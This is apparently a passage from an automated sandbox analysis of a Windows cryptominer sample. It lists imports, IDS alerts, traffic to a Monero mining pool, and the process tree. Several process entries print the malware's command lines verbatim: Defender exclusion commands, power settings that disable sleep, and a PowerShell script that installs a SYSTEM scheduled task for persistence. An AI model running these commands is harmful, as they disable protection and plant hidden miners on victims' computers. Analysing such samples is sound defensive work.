                                                                                                            .reloc0x2100000x8c0x200944c5cb74a70ebbc47b74c30d389f31fFalse0.265625data1.669620791870289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_MANIFEST0x20f0580x330XML 1.0 document, ASCII textEnglishUnited States0.508578431372549
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllCreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetLastError, GetModuleFileNameW, GetStartupInfoW, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, ReleaseSemaphore, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject
                                                                                                            msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __iob_func, __set_app_type, __setusermatherr, __wgetmainargs, __winitenv, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcmdln, _wcsicmp, _wgetenv, abort, calloc, exit, fprintf, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-04T19:39:35.160404+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.749782TCP
                                                                                                            2024-11-04T19:40:15.342501+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.749924TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 4, 2024 19:39:52.472114086 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:39:52.477202892 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:52.477264881 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:39:52.477547884 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:39:52.482523918 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.335546017 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.335692883 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.336184978 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:39:53.336628914 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:39:53.341604948 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.594301939 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.594527006 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.594701052 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:39:53.649846077 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:39:53.695029020 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:40:01.496063948 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:40:01.538829088 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:40:11.493923903 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:40:11.538845062 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:40:26.448575974 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:40:26.492130041 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:40:36.325937986 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:40:36.367085934 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:40:46.544358015 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:40:46.585935116 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:40:48.826544046 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:40:48.867130995 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:41:00.821130037 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:41:00.867532015 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:41:10.820322990 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:41:10.867234945 CET4985510343192.168.2.754.37.232.103
                                                                                                            Nov 4, 2024 19:41:20.887023926 CET103434985554.37.232.103192.168.2.7
                                                                                                            Nov 4, 2024 19:41:20.929678917 CET4985510343192.168.2.754.37.232.103
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 4, 2024 19:39:13.025748014 CET6048153192.168.2.71.1.1.1
                                                                                                            Nov 4, 2024 19:39:52.461918116 CET5744753192.168.2.71.1.1.1
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET53574471.1.1.1192.168.2.7
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 4, 2024 19:39:13.025748014 CET192.168.2.71.1.1.10x9749Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.461918116 CET192.168.2.71.1.1.10xc9a2Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 4, 2024 19:39:13.033838034 CET1.1.1.1192.168.2.70x9749No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:14.472361088 CET1.1.1.1192.168.2.70x5afbNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:14.472361088 CET1.1.1.1192.168.2.70x5afbNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                                                            Nov 4, 2024 19:39:52.469952106 CET1.1.1.1192.168.2.70xc9a2No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false

                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:13:39:16
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Users\user\Desktop\ahlntQUj2t.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\ahlntQUj2t.exe"
                                                                                                            Imagebase:0x7ff624ac0000
                                                                                                            File size:2'137'088 bytes
                                                                                                            MD5 hash:934E9A3E294FA41C527FBD6DC867DDEC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:1
                                                                                                            Start time:13:39:16
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                            Imagebase:0x7ff741d30000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:13:39:16
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                            Imagebase:0x7ff79b6a0000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }
                                                                                                            Imagebase:0x7ff741d30000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:11
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:12
                                                                                                            Start time:13:39:20
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:13
                                                                                                            Start time:13:39:26
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }
                                                                                                            Imagebase:0x7ff741d30000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:14
                                                                                                            Start time:13:39:26
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:15
                                                                                                            Start time:13:39:27
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL
                                                                                                            Imagebase:0x7ff6352a0000
                                                                                                            File size:235'008 bytes
                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:16
                                                                                                            Start time:13:39:27
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Program Files\xjfgcnhmcvxy.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\xjfgcnhmcvxy.exe"
                                                                                                            Imagebase:0x7ff723470000
                                                                                                            File size:2'137'088 bytes
                                                                                                            MD5 hash:934E9A3E294FA41C527FBD6DC867DDEC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 50%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:17
                                                                                                            Start time:13:39:27
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                            Imagebase:0x7ff741d30000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:18
                                                                                                            Start time:13:39:27
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:19
                                                                                                            Start time:13:39:29
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                            Imagebase:0x7ff79b6a0000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:13:39:29
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:21
                                                                                                            Start time:13:39:29
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }
                                                                                                            Imagebase:0x7ff741d30000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:13:39:29
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:23
                                                                                                            Start time:13:39:29
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:24
                                                                                                            Start time:13:39:30
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:25
                                                                                                            Start time:13:39:30
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:13:39:30
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                            Imagebase:0x7ff769b00000
                                                                                                            File size:96'256 bytes
                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:28
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\conhost.exe xcgkmjxjdowq
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:29
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                                                            Imagebase:0x7ff79b6a0000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:30
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                                                            Imagebase:0x7ff79b6a0000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:31
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:32
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:33
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:wmic PATH Win32_VideoController GET Name, VideoProcessor
